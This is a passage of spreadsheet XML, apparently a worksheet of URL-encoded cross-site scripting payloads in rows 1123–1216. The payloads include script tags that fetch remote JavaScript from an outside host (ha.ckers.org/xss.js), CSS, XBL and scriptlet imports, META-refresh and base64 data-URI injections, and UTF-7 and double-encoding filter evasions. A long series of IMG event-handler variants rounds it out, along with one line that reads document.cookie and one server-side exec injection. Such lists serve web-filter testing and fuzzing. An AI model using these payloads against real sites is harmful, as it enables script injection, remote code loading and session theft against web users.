      <c r="A1123" s="3" t="s">
        <v>506</v>
      </c>
      <c r="B1123" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E</v>
      </c>
    </row>
    <row r="1124">
      <c r="A1124" s="3" t="s">
        <v>507</v>
      </c>
      <c r="B1124" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1125">
      <c r="A1125" s="3" t="s">
        <v>508</v>
      </c>
      <c r="B1125" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22Link%22%20Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B%20REL%3Dstylesheet%22%3E</v>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" s="3" t="s">
        <v>509</v>
      </c>
      <c r="B1126" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" s="3" t="s">
        <v>510</v>
      </c>
      <c r="B1127" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Aalert%28%22XSS%22%29%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" s="3" t="s">
        <v>511</v>
      </c>
      <c r="B1128" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20STYLE%3D%22xss%3Aexpr%2F%2AXSS%2A%2Fession%28alert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" s="3" t="s">
        <v>935</v>
      </c>
      <c r="B1129" s="4" t="str">
        <f t="shared" si="1"/>
        <v>exp%2F%2A%3CA%20STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B</v>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" s="3" t="s">
        <v>936</v>
      </c>
      <c r="B1130" s="4" t="str">
        <f t="shared" si="1"/>
        <v>xss%3Aex%2F%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E</v>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" s="3" t="s">
        <v>513</v>
      </c>
      <c r="B1131" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20TYPE%3D%22text%2Fjavascript%22%3Ealert%28%27XSS%27%29%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" s="3" t="s">
        <v>514</v>
      </c>
      <c r="B1132" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E.XSS%7Bbackground-image%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%3B%7D%3C%2FSTYLE%3E%3CA%20CLASS%3DXSS%3E%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" s="3" t="s">
        <v>515</v>
      </c>
      <c r="B1133" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" s="3" t="s">
        <v>516</v>
      </c>
      <c r="B1134" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" s="3" t="s">
        <v>517</v>
      </c>
      <c r="B1135" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22behavior%3A%20url%28xss.htc%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" s="3" t="s">
        <v>518</v>
      </c>
      <c r="B1136" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%C2%BCscript%C2%BEalert%28%C2%A2XSS%C2%A2%29%C2%BC%2Fscript%C2%BE</v>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" s="3" t="s">
        <v>519</v>
      </c>
      <c r="B1137" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" s="3" t="s">
        <v>520</v>
      </c>
      <c r="B1138" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%20base64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E</v>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" s="3" t="s">
        <v>521</v>
      </c>
      <c r="B1139" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" s="3" t="s">
        <v>522</v>
      </c>
      <c r="B1140" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" s="3" t="s">
        <v>523</v>
      </c>
      <c r="B1141" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert%28document.cookie%29%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" s="3" t="s">
        <v>524</v>
      </c>
      <c r="B1142" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FFRAMESET%3E</v>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" s="3" t="s">
        <v>525</v>
      </c>
      <c r="B1143" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" s="3" t="s">
        <v>526</v>
      </c>
      <c r="B1144" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%3E%3CTD%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" s="3" t="s">
        <v>527</v>
      </c>
      <c r="B1145" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" s="3" t="s">
        <v>528</v>
      </c>
      <c r="B1146" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%5C0075%5C0072%5C006C%5C0028%27%5C006a%5C0061%5C0076%5C0061%5C0073%5C0063%5C0072%5C0069%5C0070%5C0074%5C003a%5C0061%5C006c%5C0065%5C0072%5C0074%5C0028.1027%5C0058.1053%5C0053%5C0027%5C0029%27%5C0029%22%3E</v>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" s="3" t="s">
        <v>529</v>
      </c>
      <c r="B1147" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28%26%231%3Bjavascript%3Aalert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" s="3" t="s">
        <v>530</v>
      </c>
      <c r="B1148" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22width%3A%20expression%28alert%28%27XSS%27%29%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" s="3" t="s">
        <v>937</v>
      </c>
      <c r="B1149" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Bif%20gte%20IE%204%5D%3E%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E%3C%21%5Bendif%5D--%3E</v>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" s="3" t="s">
        <v>531</v>
      </c>
      <c r="B1150" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBASE%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" s="3" t="s">
        <v>532</v>
      </c>
      <c r="B1151" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20TYPE%3D%22text%2Fx-scriptlet%22%20DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E</v>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" s="3" t="s">
        <v>535</v>
      </c>
      <c r="B1152" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27%3CSCR%27%22--%3E%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27IPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E</v>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" s="3" t="s">
        <v>536</v>
      </c>
      <c r="B1153" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20echo%28%27%3CSCR%29%27%3Becho%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B%20%3F%3E</v>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" s="3" t="s">
        <v>537</v>
      </c>
      <c r="B1154" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E</v>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" s="3" t="s">
        <v>539</v>
      </c>
      <c r="B1155" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22Set-Cookie%22%20Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" s="3" t="s">
        <v>540</v>
      </c>
      <c r="B1156" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHEAD%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT%3D%22text%2Fhtml%3B%20charset%3DUTF-7%22%3E%20%3C%2FHEAD%3E%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" s="3" t="s">
        <v>541</v>
      </c>
      <c r="B1157" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" s="3" t="s">
        <v>542</v>
      </c>
      <c r="B1158" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" s="3" t="s">
        <v>543</v>
      </c>
      <c r="B1159" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%22%20%27%27%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" s="3" t="s">
        <v>544</v>
      </c>
      <c r="B1160" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20%22a%3D%27%3E%27%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" s="3" t="s">
        <v>545</v>
      </c>
      <c r="B1161" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%60%3E%60%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" s="3" t="s">
        <v>546</v>
      </c>
      <c r="B1162" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%27%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" s="3" t="s">
        <v>547</v>
      </c>
      <c r="B1163" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" s="3" t="s">
        <v>548</v>
      </c>
      <c r="B1164" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" s="3" t="s">
        <v>938</v>
      </c>
      <c r="B1165" s="4" t="str">
        <f t="shared" si="1"/>
        <v>0%5C%22autofocus%2Fonfocus%3Dalert%281%29--%3E%3Cvideo%2Fposter%2F%20error%3Dprompt%282%29%3E%22-confirm%283%29-%22</v>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" s="3" t="s">
        <v>939</v>
      </c>
      <c r="B1166" s="4" t="str">
        <f t="shared" si="1"/>
        <v>veris--%3Egroup%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%2F%2F</v>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" s="3" t="s">
        <v>940</v>
      </c>
      <c r="B1167" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%23%22%3E%3Cimg%20src%3DM%20onerror%3Dalert%28%27XSS%27%29%3B%3E</v>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" s="3" t="s">
        <v>941</v>
      </c>
      <c r="B1168" s="4" t="str">
        <f t="shared" si="1"/>
        <v>element%5Battribute%3D%27%3Cimg%20src%3Dx%20onerror%3Dalert%28%27XSS%27%29%3B%3E</v>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" s="3" t="s">
        <v>942</v>
      </c>
      <c r="B1169" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5B%3Cblockquote%20cite%3D%22%5D%22%3E%5B%22%20onmouseover%3D%22alert%28%27RVRSH3LL_XSS%27%29%3B%22%20%5D</v>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" s="3" t="s">
        <v>943</v>
      </c>
      <c r="B1170" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2522%3Balert%2528%2527RVRSH3LL_XSS%2529%2F%2F</v>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" s="3" t="s">
        <v>944</v>
      </c>
      <c r="B1171" s="4" t="str">
        <f t="shared" si="1"/>
        <v>javascript%3Aalert%25281%2529%3B</v>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" s="3" t="s">
        <v>945</v>
      </c>
      <c r="B1172" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cw%20contenteditable%20id%3Dx%20onfocus%3Dalert%28%29%3E</v>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" s="3" t="s">
        <v>946</v>
      </c>
      <c r="B1173" s="4" t="str">
        <f t="shared" si="1"/>
        <v>alert%3Bpg%28%22XSS%22%29</v>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" s="3" t="s">
        <v>947</v>
      </c>
      <c r="B1174" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%2Fonload%3D%2526%2523097lert%2526lpar%3B1337%29%3E</v>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" s="3" t="s">
        <v>948</v>
      </c>
      <c r="B1175" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Efor%28%28i%29in%28self%29%29eval%28i%29%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" s="3" t="s">
        <v>949</v>
      </c>
      <c r="B1176" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C%2Fscr%3C%2Fscript%3Eipt%3E%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C%2Fscr%3C%2Fscript%3Eipt%3E</v>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" s="3" t="s">
        <v>950</v>
      </c>
      <c r="B1177" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CsCR%3Cscript%3EiPt%3Ealert%281%29%3C%2FSCr%3C%2Fscript%3EIPt%3E</v>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" s="3" t="s">
        <v>951</v>
      </c>
      <c r="B1178" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4%3D%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" s="3" t="s">
        <v>135</v>
      </c>
      <c r="B1179" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%25253Cscript%25253Ealert%28%27XSS%27%29%25253C%25252Fscript%25253E</v>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" s="3" t="s">
        <v>952</v>
      </c>
      <c r="B1180" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onload%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" s="3" t="s">
        <v>953</v>
      </c>
      <c r="B1181" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onafterprint%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" s="3" t="s">
        <v>954</v>
      </c>
      <c r="B1182" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onbeforeprint%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" s="3" t="s">
        <v>955</v>
      </c>
      <c r="B1183" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onbeforeunload%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" s="3" t="s">
        <v>956</v>
      </c>
      <c r="B1184" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onerror%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" s="3" t="s">
        <v>957</v>
      </c>
      <c r="B1185" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onhashchange%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" s="3" t="s">
        <v>952</v>
      </c>
      <c r="B1186" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onload%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" s="3" t="s">
        <v>958</v>
      </c>
      <c r="B1187" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onmessage%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" s="3" t="s">
        <v>959</v>
      </c>
      <c r="B1188" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ononline%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" s="3" t="s">
        <v>960</v>
      </c>
      <c r="B1189" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onoffline%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" s="3" t="s">
        <v>961</v>
      </c>
      <c r="B1190" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onpagehide%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" s="3" t="s">
        <v>962</v>
      </c>
      <c r="B1191" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onpageshow%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" s="3" t="s">
        <v>963</v>
      </c>
      <c r="B1192" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onpopstate%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" s="3" t="s">
        <v>964</v>
      </c>
      <c r="B1193" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onresize%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1194">
      <c r="A1194" s="3" t="s">
        <v>965</v>
      </c>
      <c r="B1194" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onstorage%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" s="3" t="s">
        <v>966</v>
      </c>
      <c r="B1195" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onunload%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" s="3" t="s">
        <v>967</v>
      </c>
      <c r="B1196" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onblur%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" s="3" t="s">
        <v>968</v>
      </c>
      <c r="B1197" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onchange%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" s="3" t="s">
        <v>969</v>
      </c>
      <c r="B1198" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20oncontextmenu%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" s="3" t="s">
        <v>970</v>
      </c>
      <c r="B1199" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20oninput%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" s="3" t="s">
        <v>971</v>
      </c>
      <c r="B1200" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20oninvalid%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" s="3" t="s">
        <v>972</v>
      </c>
      <c r="B1201" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onreset%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" s="3" t="s">
        <v>973</v>
      </c>
      <c r="B1202" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onsearch%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" s="3" t="s">
        <v>974</v>
      </c>
      <c r="B1203" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onselect%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" s="3" t="s">
        <v>975</v>
      </c>
      <c r="B1204" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onsubmit%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" s="3" t="s">
        <v>976</v>
      </c>
      <c r="B1205" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onkeydown%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" s="3" t="s">
        <v>977</v>
      </c>
      <c r="B1206" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onkeypress%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" s="3" t="s">
        <v>978</v>
      </c>
      <c r="B1207" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onkeyup%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" s="3" t="s">
        <v>979</v>
      </c>
      <c r="B1208" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onclick%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" s="3" t="s">
        <v>980</v>
      </c>
      <c r="B1209" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ondblclick%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" s="3" t="s">
        <v>981</v>
      </c>
      <c r="B1210" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onmousedown%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" s="3" t="s">
        <v>982</v>
      </c>
      <c r="B1211" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onmousemove%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" s="3" t="s">
        <v>983</v>
      </c>
      <c r="B1212" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onmouseout%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" s="3" t="s">
        <v>984</v>
      </c>
      <c r="B1213" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onmouseover%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" s="3" t="s">
        <v>985</v>
      </c>
      <c r="B1214" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onmouseup%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" s="3" t="s">
        <v>986</v>
      </c>
      <c r="B1215" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onmousewheel%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" s="3" t="s">
        <v>987</v>
      </c>
      <c r="B1216" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onwheel%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" s="3" t="s">
        <v>988</v>
